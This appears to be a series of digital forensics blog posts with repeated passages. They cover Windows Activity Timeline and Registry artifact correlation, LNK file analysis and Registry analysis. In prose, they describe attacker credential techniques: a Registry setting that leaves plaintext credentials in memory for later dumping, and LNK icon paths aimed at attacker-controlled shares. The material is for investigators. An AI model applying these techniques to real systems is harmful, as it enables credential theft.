TIMELINE - End Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wed Nov 20 23:04:14 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 23:00:51 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 22:58:07 2019 Z
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe C:\Users\harlan\Desktop\A_Forensic_Audit_of_the_Tor_Browser_Bundle4.pdf
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
I was doing some research into a particular Registry value, and a search had revealed a hit within the PDF. I opened the PDF, and while it was open, also opened the MiTeC Windows Registry Recovery (WRR.exe) tool.
Another interesting finding is illustrated below:
Wed Nov 20 22:50:02 2019 Z
REG - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
TIMELINE - End Time:Windows\regedit.exe
Wed Nov 20 22:49:11 2019 Z
TIMELINE - Start Time:Windows\regedit.exe
Wed Nov 20 22:49:07 2019 Z
REG - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
REG - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)
I opened RegEdit, navigated to a specific key, and that key was in focus when I closed RegEdit. With respect to the LastKey value, we're aware that's the context of the data...the key that was in focus with RegEdit was closed. What this clearly illustrates is "humanness"...human-based actions occurring and being recorded in these data sources. We can see from the UserAssist data how RegEdit was opened, we can see how long it was open (in this case, ~50 sec or so), and which key was in focus when it was closed. Looked at together, these artifacts provide a clear illustration of human activity.
Here's another example of what correlating the two data sources can look like:
Wed Nov 20 21:11:29 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 21:10:01 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs - local
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.dat - NTUSER.DAT
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder - local
Wed Nov 20 21:09:45 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
REG - [Program Execution] UserAssist - C:\Users\harlan\Desktop\WRR.exe (1)
In this particular case, I'd opened WRR and loaded an NTUSER.DAT file from a folder called "local".
Here's an example of how correlating the two data sources can provide additional insight and context into accessing files:
Wed Nov 20 20:20:56 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc - Armor of God.doc
TIMELINE - End Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
Wed Nov 20 20:09:29 2019 Z
REG - Word File MRU - C:\Users\harlan\Desktop\Armor of God.doc
REG - Word Place MRU - C:\Users\harlan\Desktop\
Wed Nov 20 20:09:28 2019 Z
TIMELINE - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
REG - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)
In this particular case, I was preparing for Bible study and had a Word document open. The data from the Activity Timeline database showed that MSWord had been opened, but it took data from the NTUSER.DAT hive (RecentDocs and MSOffice plugins) to provide information about which file had been opened. In this case, the data illustrates that I'd had the file open approximately 11 minutes.
I could go on with the examples but suffice to say that the ActivitiesCache.db data provides context and validation to data from other sources; in this case, from data from the NTUSER.DAT hive associated with user activity. Adding additional data from other sources, such as Automatic JumpLists would not only provide additional context, but would be extremely valuable in the face of anti-forensics efforts. Getting a good view of what constitutes artifact clusters will also help us seen when elements from those clusters are missing, potentially through deletion efforts.
Further, the correlation of multiple data sources gives us a better view not only of artifact clusters, but also of past activities. As I went through the timeline data, I was references to files and applications that no longer existed on my system. I also saw references to files on external data sources (F:\, G:\, etc.), as well.
Something else I found as a result of this exercise was that the first entry in the database table appears to be dated 20 Jun 2019. Based solely on the data available, it would appear that an update was applied, as I'm also seeing all of the LastWrite times for RecentDocs subkeys set to the same time shortly before the first entry in the database. A quick query via WMIC reveals that a security update was installed on that day, for KB4498523. The finding is reminiscent of what Jason Hale discussed in his blog post regarding shellbags and a Win10 feature update.
Going Deeper
A while back, Mari had written a tool to parse deleted entries from a SQLite database, so I thought I'd give it a shot. I downloaded the CLI version of the tool, and after running it, got a TSV file that I opened up in Excel. There were a total of 630 rows, not all of which seemed to have much data, let alone much data of value. However, many of the rows contained what looked like extensive JSON-formatted data. A number of these contained references to files I'd opened in Notepad++, including the full path to the file, as well as the following:
{"gdprType":"ProductAndServiceUsage","clipboardDataId":"
So, much like other data sources, it appears that deleted items from this database file can provide additional insight and context, as well.
Additional Resources:
GroupIB writeup
Salt4n6 writeup
CCLGroup LTD writeup
Journal of Forensic Science paper
Medium.com article - lists descriptive resources, and tools, including Mark McKinnon's Autopsy plugin
PureInfoTech article - disabling the Timeline Activity feature (be sure to look for this being used for anti-forensics, or check the value if you're not finding the ActivitiesCache.db file)
Tools:
kacos2000 - WindowsTimeline
forensicMatt - ActivitiesCacheParser
Eric Z's Tools site
TZWorks - Timeline ActivitiesCache parser
Mari's SQLParser tools
First, I grabbed a copy of my own ActivitiesCache.db file:
esentutil /y /vss
Then I grabbed a copy of my NTUSER.DAT hive:
reg save HKCU NTUSER.DAT
I used Eric Zimmerman's WxTCmd tool to parse the database; from the output, I got two CSV files (as described in Eric's blog post for the tool), one for the Activity table. I then wrote a Perl script to translate elements of the Activity table into the 5-field TLN timeline format that I use for analysis. This way, I was able to do something of a side-by-side comparison of data from the NTUSER.DAT hive with the contents of the ActivitiesCache.db database. Specifically, I created a timeline using the TLN variants of the UserAssist, RecentDocs, Applets, MSOffice and RecentApps RegRipper plugins, and then added the Activity table data to the events file before parsing it into a timeline.
What I found was pretty interesting.
For one, the data from the Activities table illustrated some interesting activity. For example, here's what the data looks like for when I opened a PDF document from my desktop:
Wed Nov 20 23:04:15 2019 Z
TIMELINE - End Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
Wed Nov 20 23:04:14 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 23:00:51 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 22:58:07 2019 Z
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe C:\Users\harlan\Desktop\A_Forensic_Audit_of_the_Tor_Browser_Bundle4.pdf
TIMELINE - Start Time:Program Files x86\Adobe\Reader 11.0\Reader\AcroRd32.exe
I was doing some research into a particular Registry value, and a search had revealed a hit within the PDF. I opened the PDF, and while it was open, also opened the MiTeC Windows Registry Recovery (WRR.exe) tool.
Another interesting finding is illustrated below:
Wed Nov 20 22:50:02 2019 Z
REG - RegEdit LastKey value -> Computer\HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\TaskFlow
TIMELINE - End Time:Windows\regedit.exe
Wed Nov 20 22:49:11 2019 Z
TIMELINE - Start Time:Windows\regedit.exe
Wed Nov 20 22:49:07 2019 Z
REG - [Program Execution] UserAssist - {F38BF404-1D43-42F2-9305-67DE0B28FC23}\regedit.exe (1)
REG - [Program Execution] UserAssist - {0139D44E-6AFE-49F2-8690-3DAFCAE6FFB8}\Administrative Tools\Registry Editor.lnk (1)
I opened RegEdit, navigated to a specific key, and that key was in focus when I closed RegEdit. With respect to the LastKey value, we're aware that's the context of the data...the key that was in focus with RegEdit was closed. What this clearly illustrates is "humanness"...human-based actions occurring and being recorded in these data sources. We can see from the UserAssist data how RegEdit was opened, we can see how long it was open (in this case, ~50 sec or so), and which key was in focus when it was closed. Looked at together, these artifacts provide a clear illustration of human activity.
Here's another example of what correlating the two data sources can look like:
Wed Nov 20 21:11:29 2019 Z
TIMELINE - End Time:C:\Users\harlan\Desktop\WRR.exe
Wed Nov 20 21:10:01 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs - local
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.dat - NTUSER.DAT
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\Folder - local
Wed Nov 20 21:09:45 2019 Z
TIMELINE - Start Time:C:\Users\harlan\Desktop\WRR.exe
REG - [Program Execution] UserAssist - C:\Users\harlan\Desktop\WRR.exe (1)
In this particular case, I'd opened WRR and loaded an NTUSER.DAT file from a folder called "local".
Here's an example of how correlating the two data sources can provide additional insight and context into accessing files:
Wed Nov 20 20:20:56 2019 Z
REG - RecentDocs - Software\Microsoft\Windows\CurrentVersion\Explorer\RecentDocs\.doc - Armor of God.doc
TIMELINE - End Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
Wed Nov 20 20:09:29 2019 Z
REG - Word File MRU - C:\Users\harlan\Desktop\Armor of God.doc
REG - Word Place MRU - C:\Users\harlan\Desktop\
Wed Nov 20 20:09:28 2019 Z
TIMELINE - Start Time:Program Files x86\Microsoft Office\Office14\WINWORD.EXE
REG - [Program Execution] UserAssist - {7C5A40EF-A0FB-4BFC-874A-C0F2E0B9FA8E}\Microsoft Office\Office14\WINWORD.EXE (5)
In this particular case, I was preparing for Bible study and had a Word document open. The data from the Activity Timeline database showed that MSWord had been opened, but it took data from the NTUSER.DAT hive (RecentDocs and MSOffice plugins) to provide information about which file had been opened. In this case, the data illustrates that I'd had the file open approximately 11 minutes.
I could go on with the examples but suffice to say that the ActivitiesCache.db data provides context and validation to data from other sources; in this case, from data from the NTUSER.DAT hive associated with user activity. Adding additional data from other sources, such as Automatic JumpLists would not only provide additional context, but would be extremely valuable in the face of anti-forensics efforts. Getting a good view of what constitutes artifact clusters will also help us seen when elements from those clusters are missing, potentially through deletion efforts.
Further, the correlation of multiple data sources gives us a better view not only of artifact clusters, but also of past activities. As I went through the timeline data, I was references to files and applications that no longer existed on my system. I also saw references to files on external data sources (F:\, G:\, etc.), as well.
Something else I found as a result of this exercise was that the first entry in the database table appears to be dated 20 Jun 2019. Based solely on the data available, it would appear that an update was applied, as I'm also seeing all of the LastWrite times for RecentDocs subkeys set to the same time shortly before the first entry in the database. A quick query via WMIC reveals that a security update was installed on that day, for KB4498523. The finding is reminiscent of what Jason Hale discussed in his blog post regarding shellbags and a Win10 feature update.
Going Deeper
A while back, Mari had written a tool to parse deleted entries from a SQLite database, so I thought I'd give it a shot. I downloaded the CLI version of the tool, and after running it, got a TSV file that I opened up in Excel. There were a total of 630 rows, not all of which seemed to have much data, let alone much data of value. However, many of the rows contained what looked like extensive JSON-formatted data. A number of these contained references to files I'd opened in Notepad++, including the full path to the file, as well as the following:
{"gdprType":"ProductAndServiceUsage","clipboardDataId":"
So, much like other data sources, it appears that deleted items from this database file can provide additional insight and context, as well.
Additional Resources:
GroupIB writeup
Salt4n6 writeup
CCLGroup LTD writeup
Journal of Forensic Science paper
Medium.com article - lists descriptive resources, and tools, including Mark McKinnon's Autopsy plugin
PureInfoTech article - disabling the Timeline Activity feature (be sure to look for this being used for anti-forensics, or check the value if you're not finding the ActivitiesCache.db file)
Tools:
kacos2000 - WindowsTimeline
forensicMatt - ActivitiesCacheParser
Eric Z's Tools site
TZWorks - Timeline ActivitiesCache parser
Mari's SQLParser tools
Saturday, November 02, 2019
More Regarding LNK Files
My recent post regarding LNK files got me thinking about other uses of LNK files. That previous post really illustrated how some analysts are following Jesse Kornblum's adage of "using every part of the buffalo", in that they made use of everything (or as close to it as they could) they had available in order to develop a #threatintel picture.
This got me to thinking...taking a step back, how else can LNK files be used?
DFIR Analysis
Some DFIR analysts are aware of the fact that when analyzing Windows systems, you're going to find Windows shortcut/LNK files in a number of locations. For example, there're the user's desktop, the user's Recent folder, etc. In addition, Automatic JumpList files are OLE structured storage format files, and all but one of the streams follow the LNK file format. So, the file format is widely used on Windows systems, and the location of the file or stream provides some useful context that can also be applied to the content.
LNK files contain a good bit of metadata, as they contain shell items (as do other artifacts, such as shellbags), which are blobs of binary data that describe various objects on Windows systems. In the case of folder objects, specifically, one of the elements found to be embedded within the metadata is the MFT reference number for that folder object. This reference number is comprised of the record number (i.e., location within the MFT), as well as the sequence number (in short, "...this is the nth time this record has been used.")
Okay...so what?
Well, when it comes to artifacts of use, or more specifically, file access, the LNK files created as a result of user activity can remain on the system long after the files and applications with which they're associated have been removed or deleted. Say that you're investigating access to a particular file (by name or folder path) and your goal is to illustrate that the user had knowledge of that file. If the user accessed the file by double-clicking on it, an LNK file will have been created, and that file will persist well beyond the deletion of the target file itself. These artifacts will also persist beyond the removal of the associated application, as well.
This can be useful to us because it gives us something of a historical view of the file system. For example, let's say that the per the MFT, record number 2357, with sequence number 5, points to a folder on the user's desktop called "Personal Stuff". Now, suppose we find a LNK file that points to the fact that the user opened a file that was located in a folder named "Hacker Tools", and the MFT reference number extracted from the LNK file is 2357/4, or 2357/3. This provides us with a view of what the file system used to look like, giving us something a historical "smear" of the file system.
Also, these LNK files can provide information regarding external devices, as well. The basic shell items are created in the user's shellbags when they use Windows Explorer to navigate folders on an external device, such as a USB thumb drive, USB-connected smartphone, etc. Then if they open files, shell items are created to populate LNK files pointing to those files.
Adversary Persistence
Adversaries have been observed persisting beyond password updates by modifying the iconfile name attribute of an LNK file to point to a resource that they (the adversary) control. What happens if the LNK file is at the root of a directory is that when a user/admin browsers to the folder, Windows parses the file and attempts to load the icon from the remote resource, using the user's credentials to authenticate, first via SMB, and then via WebDAV.
Other Ways To Use LNK Files
"Using" LNK files can apply to the adversary, as well as to an analyst (DFIR, intel, etc.). There's this write-up on Kovter, describing how the adversary uses/used LNK files, and there's this BitOfHex blog post describing how to derive intel from LNK files. There's also hexacorn's older blog post regarding the use of hotkeys and LNK files, and this USCERT alert that describes the use of the adversary persistence technique described above (not 'new' or an 'other' use, but placed here as an illustration).
This got me to thinking...taking a step back, how else can LNK files be used?
DFIR Analysis
Some DFIR analysts are aware of the fact that when analyzing Windows systems, you're going to find Windows shortcut/LNK files in a number of locations. For example, there're the user's desktop, the user's Recent folder, etc. In addition, Automatic JumpList files are OLE structured storage format files, and all but one of the streams follow the LNK file format. So, the file format is widely used on Windows systems, and the location of the file or stream provides some useful context that can also be applied to the content.
LNK files contain a good bit of metadata, as they contain shell items (as do other artifacts, such as shellbags), which are blobs of binary data that describe various objects on Windows systems. In the case of folder objects, specifically, one of the elements found to be embedded within the metadata is the MFT reference number for that folder object. This reference number is comprised of the record number (i.e., location within the MFT), as well as the sequence number (in short, "...this is the nth time this record has been used.")
Okay...so what?
Well, when it comes to artifacts of use, or more specifically, file access, the LNK files created as a result of user activity can remain on the system long after the files and applications with which they're associated have been removed or deleted. Say that you're investigating access to a particular file (by name or folder path) and your goal is to illustrate that the user had knowledge of that file. If the user accessed the file by double-clicking on it, an LNK file will have been created, and that file will persist well beyond the deletion of the target file itself. These artifacts will also persist beyond the removal of the associated application, as well.
This can be useful to us because it gives us something of a historical view of the file system. For example, let's say that the per the MFT, record number 2357, with sequence number 5, points to a folder on the user's desktop called "Personal Stuff". Now, suppose we find a LNK file that points to the fact that the user opened a file that was located in a folder named "Hacker Tools", and the MFT reference number extracted from the LNK file is 2357/4, or 2357/3. This provides us with a view of what the file system used to look like, giving us something a historical "smear" of the file system.
Also, these LNK files can provide information regarding external devices, as well. The basic shell items are created in the user's shellbags when they use Windows Explorer to navigate folders on an external device, such as a USB thumb drive, USB-connected smartphone, etc. Then if they open files, shell items are created to populate LNK files pointing to those files.
Adversary Persistence
Adversaries have been observed persisting beyond password updates by modifying the iconfile name attribute of an LNK file to point to a resource that they (the adversary) control. What happens if the LNK file is at the root of a directory is that when a user/admin browsers to the folder, Windows parses the file and attempts to load the icon from the remote resource, using the user's credentials to authenticate, first via SMB, and then via WebDAV.
Other Ways To Use LNK Files
"Using" LNK files can apply to the adversary, as well as to an analyst (DFIR, intel, etc.). There's this write-up on Kovter, describing how the adversary uses/used LNK files, and there's this BitOfHex blog post describing how to derive intel from LNK files. There's also hexacorn's older blog post regarding the use of hotkeys and LNK files, and this USCERT alert that describes the use of the adversary persistence technique described above (not 'new' or an 'other' use, but placed here as an illustration).
Monday, October 28, 2019
Return of the LNK Files...
I wanted to put something scary together in time for Halloween; I was gonna go with a mullet wig, a la Joe Dirt, or maybe pass out cards with truly scary cards for those of us who are adulting, full time, such as, "...your septic field just rose and flowed down the yard into your porch...", or "...your teenager just go their license and want to drive home...". You know, truly scary stuff. However, from a #DFIR perspective (and maybe even a little bit of #threatintel) this just seemed a bit more fun and appropriate.
A recent Tweet thread from Nick Carr regarding the use of LNK files in developing threat intel caught my attention. In that thread, Nick mentions learning "about LNK analysis as a DFIR and threat intel tool", and that's something I wholeheartedly agree with. A great deal of value can be derived from LNK files...I've described them as "free money" in the past, due to the fact that an adversary sending an LNK file to a target is essentially giving away information about their infrastructure, particularly when data from LNK files is mapped across multiple campaigns.
Links from Nick's Tweet:
2017 - Fin7
2018 - Cozy Bear
Remember what I said about "multiple campaigns"? If you take a look at the second blog post linked above, you'll see the statement:
The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.
I'd had an opportunity to dig into the Cozy Bear LNK files a bit myself, as illustrated here, and described here (i.e., in an additional post regarding LNK file toolmarks).
Not long after Nick's tweet, I saw this one from ZwSetInformation, and was able to get a copy of the zipped archive, extract the LNK file and run it through my parser. Not only did I see the individual bits of information exposed by the parser, but looking across the entirety of the information showed me the toolmarks and provided an indication as to how the LNK file had been crafted.
A recent Tweet thread from Nick Carr regarding the use of LNK files in developing threat intel caught my attention. In that thread, Nick mentions learning "about LNK analysis as a DFIR and threat intel tool", and that's something I wholeheartedly agree with. A great deal of value can be derived from LNK files...I've described them as "free money" in the past, due to the fact that an adversary sending an LNK file to a target is essentially giving away information about their infrastructure, particularly when data from LNK files is mapped across multiple campaigns.
Links from Nick's Tweet:
2017 - Fin7
2018 - Cozy Bear
Remember what I said about "multiple campaigns"? If you take a look at the second blog post linked above, you'll see the statement:
The 2018 and 2016 LNK files are similar in structure and code, and contain significant metadata overlap, including the MAC address of the system on which the LNK was created.
I'd had an opportunity to dig into the Cozy Bear LNK files a bit myself, as illustrated here, and described here (i.e., in an additional post regarding LNK file toolmarks).
Not long after Nick's tweet, I saw this one from ZwSetInformation, and was able to get a copy of the zipped archive, extract the LNK file and run it through my parser. Not only did I see the individual bits of information exposed by the parser, but looking across the entirety of the information showed me the toolmarks and provided an indication as to how the LNK file had been crafted.
Monday, October 21, 2019
Registry Analysis
Something I've observed over the years is that analysis of the Windows Registry is still a largely misunderstood, misinterpreted, and under-appreciated aspect of analysis of Windows systems.
What is "Registry analysis"? Registry analysis is the observation and interpretation of data or metadata from the Windows Registry, in the context of other data/metadata, also from the Registry or other sources. The correct interpretation of this data can add an unprecedented level of granularity to the context surrounding various events observed during, for example, timeline analysis.
"Registry analysis" is not the parsing and display of individual artifacts from within the Registry; that's "parsing and display". It's also not keyword searching of the Registry; that's "keyword searching". Keyword searches or searches for indicators do not constitute "analysis". I do understand, however, that not all cases require Registry analysis. There are more than a few types of cases out there where keyword searching is all that is necessary, and I get it. Through engaging with other analysts and following up on conversations, I've seen where keyword searches have more than sufficed for a number of types of cases. But that's not the "analysis" we're talking about here.
That is not to say that keyword or indicator searches cannot be used as pivot points into more fully-fledged analysis. Very often, these searches can be an excellent entry point into analysis, allowing the investigator to winnow through vast amounts of data to determine what is initially important.
Analysis techniques where I have been able to incorporate data and metadata from the Windows Registry into an overall analysis process, have allowed me to get a better understanding of inherent activity derived or extracted from a system. This has occurred to the point, in some cases, of changing the direction of my investigation. Further, I'll be the first to admit that I haven't seen everything there is to see; in fact, within just the past weeks, I've observed activity that I had never seen before, and was able to develop an understanding of what activity led to the observed artifacts. This is not something for which keyword searching would have sufficed, and was only achieved by bringing together multiple data sources in a manner that allowed me to discern context.
Why is this important? Well, for one, Windows keeps changing. Yes, yes, I know, we've heard this before...Windows Vista was a big leap forward (with respect to DFIR artifacts) over XP/2003, and Windows 7 a similar "leap". There were some pretty interesting changes in the short-lived Windows 8/8.1 world, but we've arguably seen a (dare I say, "significant"?) spike in changes just between versions of Windows 10 since that version has been out. The point is that you can't often go for a week or two before something new with respect to the Windows operating system (and specifically the Registry) is discovered or observed. An analysis process accounts for these changes occurring. For example, one of the approaches I use to winnow down data is to create mini-timelines and overlays; in short, using very specific data sources to create a mini-timeline in order to get a view of the data without all the inherent "noise" of the operating system. I'll create a timeline from a user's Registry hives, incorporating not just time-based data extracted from the hives (i.e., shellbags, UserAssist data, etc.), but also the overall metadata from those hives. This way, I can 'see' a user's activities over time, without having to wade through massive amounts of "noise", such as Windows Updates. And, I'll not only be able to develop context, but I'll also see new things, as well.
Speaking of which, let's take a look at the great work Jason Hale has done, as an example. Some of the things we've (I use the universal "we") seen over the years have been Registry key LastWrite times associated with USB devices being universally 'stomped' by updates, as well as Registry hive "backups" no longer being written (by default) to the RegBack folder.
Jason recently pointed out that key LastWrite times associated with MRUs within the shellbags artifacts have been 'stomped' by an update, similar to what was observed with USBStor keys. What impact would this have had on your analysis had this happened 6 months, or 2 years ago? How would this have impacted your findings in a case?
Why is understanding the use and function of the Registry important when it comes to analyzing Windows systems?
Two important aspects of the Windows Registry that I've discussed during many of my speaking engagements have been:
The Windows Registry contains a great deal of configuration information about the system that, if correctly understood and correctly interpreted, can have a significant impact on your analysis.
The Registry contains a lot of configuration settings for the operating system, many set by default, right "out of the box". There are others that can be changed along the way that have an impact on what users of the systems can see and do, as well as what attackers can do. For example, there's a setting that tells the Windows operating system to store credentials in memory, in plain text. Attackers can set this value to "1", wait a week, and come back and dump the credentials from memory, and not have to spend time cracking the passwords. There are settings that tell the Windows shell to not show all user accounts on the Welcome screen, as well as settings that control the functionality of Terminal Services, etc. There are even settings within the Registry that control what users can and cannot access, and how their account functions (i.e., deleted files bypass the Recycle Bin, etc.). Understanding these settings, as well as knowing how to determine when (or if) they changed, can have a significant impact on an investigation.
There are also a number of "autostart" locations within the Registry, keys or values that tell the operating system to start applications with no other interaction from the user beyond booting the system, or logging in. Consider this Threat Research blog post regarding newly-discovered malware, for example. Not only does it include what is reportedly a new persistence mechanism, but it also includes a figure illustrating how code used by the malware is encoded and placed in the Registry for later use. Knowing this, encountering an infected system and incorporating this into our analysis will allow us to discover new information about how the malware operated or was used.
As a side-note, does anyone have an NTUSER.DAT file from a user profile infected with the malware identified in the Juniper Threat Research blog post? I'm curious if the binaryImage32_* values are detected by the RegRipper sizes.pl plugin. Thanks in advance to anyone who can check, or share such a hive file.
The Windows Registry records and maintains a great deal of user activity that, if correctly understood and interpreted, can illustrate "humanness"; that is, provide strong indications of specific, purposeful human activity, as opposed to the automatic effects of the operating system, or of malware.
There are a number of user actions...opening or saving files, launching applications, etc...that are recorded within the Windows Registry, as part of tracking user activity in order to improve the "user experience". The idea is to make Windows more "user friendly", in part by making the more frequently used functionality more easily accessible to the user. The key here is that actions specifically taken by the user can be interpreted as "humanness", as the data recorded is the direct result of a person interacting with the Windows shell, applications, etc. This can provide information to inform an investigation, particularly when knowing when someone was sitting at the keyboard is important, or when discerning whether a user or some automated function accessed data is a critical aspect of an investigation.
Thankz/Shout-Outz
Thankz and shout-outz are due to a number of folks within the #DFIR community who've contributed to the topic through research, creating tools, etc. In no specific order:
Mari DeGrazia
Maxim Suhanov
Jason Hale
Eric Zimmerman
farmerK
I apologize profusely for any names I may have missed, as it was not intentional.
What is "Registry analysis"? Registry analysis is the observation and interpretation of data or metadata from the Windows Registry, in the context of other data/metadata, also from the Registry or other sources. The correct interpretation of this data can add an unprecedented level of granularity to the context surrounding various events observed during, for example, timeline analysis.
"Registry analysis" is not the parsing and display of individual artifacts from within the Registry; that's "parsing and display". It's also not keyword searching of the Registry; that's "keyword searching". Keyword searches or searches for indicators do not constitute "analysis". I do understand, however, that not all cases require Registry analysis. There are more than a few types of cases out there where keyword searching is all that is necessary, and I get it. Through engaging with other analysts and following up on conversations, I've seen where keyword searches have more than sufficed for a number of types of cases. But that's not the "analysis" we're talking about here.
That is not to say that keyword or indicator searches cannot be used as pivot points into more fully-fledged analysis. Very often, these searches can be an excellent entry point into analysis, allowing the investigator to winnow through vast amounts of data to determine what is initially important.
Analysis techniques where I have been able to incorporate data and metadata from the Windows Registry into an overall analysis process, have allowed me to get a better understanding of inherent activity derived or extracted from a system. This has occurred to the point, in some cases, of changing the direction of my investigation. Further, I'll be the first to admit that I haven't seen everything there is to see; in fact, within just the past weeks, I've observed activity that I had never seen before, and was able to develop an understanding of what activity led to the observed artifacts. This is not something for which keyword searching would have sufficed, and was only achieved by bringing together multiple data sources in a manner that allowed me to discern context.
Why is this important? Well, for one, Windows keeps changing. Yes, yes, I know, we've heard this before...Windows Vista was a big leap forward (with respect to DFIR artifacts) over XP/2003, and Windows 7 a similar "leap". There were some pretty interesting changes in the short-lived Windows 8/8.1 world, but we've arguably seen a (dare I say, "significant"?) spike in changes just between versions of Windows 10 since that version has been out. The point is that you can't often go for a week or two before something new with respect to the Windows operating system (and specifically the Registry) is discovered or observed. An analysis process accounts for these changes occurring. For example, one of the approaches I use to winnow down data is to create mini-timelines and overlays; in short, using very specific data sources to create a mini-timeline in order to get a view of the data without all the inherent "noise" of the operating system. I'll create a timeline from a user's Registry hives, incorporating not just time-based data extracted from the hives (i.e., shellbags, UserAssist data, etc.), but also the overall metadata from those hives. This way, I can 'see' a user's activities over time, without having to wade through massive amounts of "noise", such as Windows Updates. And, I'll not only be able to develop context, but I'll also see new things, as well.
Speaking of which, let's take a look at the great work Jason Hale has done, as an example. Some of the things we've (I use the universal "we") seen over the years have been Registry key LastWrite times associated with USB devices being universally 'stomped' by updates, as well as Registry hive "backups" no longer being written (by default) to the RegBack folder.
Jason recently pointed out that key LastWrite times associated with MRUs within the shellbags artifacts have been 'stomped' by an update, similar to what was observed with USBStor keys. What impact would this have had on your analysis had this happened 6 months, or 2 years ago? How would this have impacted your findings in a case?
Why is understanding the use and function of the Registry important when it comes to analyzing Windows systems?
Two important aspects of the Windows Registry that I've discussed during many of my speaking engagements have been:
The Windows Registry contains a great deal of configuration information about the system that, if correctly understood and correctly interpreted, can have a significant impact on your analysis.
The Registry contains a lot of configuration settings for the operating system, many set by default, right "out of the box". There are others that can be changed along the way that have an impact on what users of the systems can see and do, as well as what attackers can do. For example, there's a setting that tells the Windows operating system to store credentials in memory, in plain text. Attackers can set this value to "1", wait a week, and come back and dump the credentials from memory, and not have to spend time cracking the passwords. There are settings that tell the Windows shell to not show all user accounts on the Welcome screen, as well as settings that control the functionality of Terminal Services, etc. There are even settings within the Registry that control what users can and cannot access, and how their account functions (i.e., deleted files bypass the Recycle Bin, etc.). Understanding these settings, as well as knowing how to determine when (or if) they changed, can have a significant impact on an investigation.
There are also a number of "autostart" locations within the Registry, keys or values that tell the operating system to start applications with no other interaction from the user beyond booting the system, or logging in. Consider this Threat Research blog post regarding newly-discovered malware, for example. Not only does it include what is reportedly a new persistence mechanism, but it also includes a figure illustrating how code used by the malware is encoded and placed in the Registry for later use. Knowing this, encountering an infected system and incorporating this into our analysis will allow us to discover new information about how the malware operated or was used.
As a side-note, does anyone have an NTUSER.DAT file from a user profile infected with the malware identified in the Juniper Threat Research blog post? I'm curious if the binaryImage32_* values are detected by the RegRipper sizes.pl plugin. Thanks in advance to anyone who can check, or share such a hive file.
The Windows Registry records and maintains a great deal of user activity that, if correctly understood and interpreted, can illustrate "humanness"; that is, provide strong indications of specific, purposeful human activity, as opposed to the automatic effects of the operating system, or of malware.
There are a number of user actions...opening or saving files, launching applications, etc...that are recorded within the Windows Registry, as part of tracking user activity in order to improve the "user experience". The idea is to make Windows more "user friendly", in part by making the more frequently used functionality more easily accessible to the user. The key here is that actions specifically taken by the user can be interpreted as "humanness", as the data recorded is the direct result of a person interacting with the Windows shell, applications, etc. This can provide information to inform an investigation, particularly when knowing when someone was sitting at the keyboard is important, or when discerning whether a user or some automated function accessed data is a critical aspect of an investigation.
Thankz/Shout-Outz
Thankz and shout-outz are due to a number of folks within the #DFIR community who've contributed to the topic through research, creating tools, etc. In no specific order:
Mari DeGrazia
Maxim Suhanov
Jason Hale
Eric Zimmerman
farmerK
I apologize profusely for any names I may have missed, as it was not intentional.
Friday, September 20, 2019
A Brief History of DFIR Time, pt II
Continuing on from my previous post...
Once I left active duty, one of my first jobs was in an information security role, and I was doing a fair bit of "war dialing", which was fun. The main programs we used at the time were THC Scan and Tone Loc, but in a pinch, you could use the Windows dialer to connect to a number, and listen to the laptop speaker to determine what was on the other end. In most instances, you'd get someone saying, "hello?", but in the few instances where a computer or fax would pick up, we'd note that and move on. The laptops available at the time had built-in modems, as well as PCMCIA slots if you wanted to insert a network (ethernet or, yes, token ring) card. Our laptop bags had phone and ethernet cables, but most companies wouldn't spring for a token ring card because (a) they were expensive and (b) not many customers had token ring networks. Until you went on-site and someone said, "uh...oh, yeah...we use token ring." Of course, no one would say anything during the initial call unless you specifically asked, so that question went on script.
At that time, "computer forensics" was really not well known outside of very small circles, so there weren't much in the way of "go bags" or kits. The few folks "doing" computer forensics at the time (that I was aware of) were largely former AF OSI enlisted folks, sequestered behind heavy duty doors with special locks. When you did get a peek inside their wizardy world, the biggest component was a custom-built tower system with extra bays, and everything running on Linux.
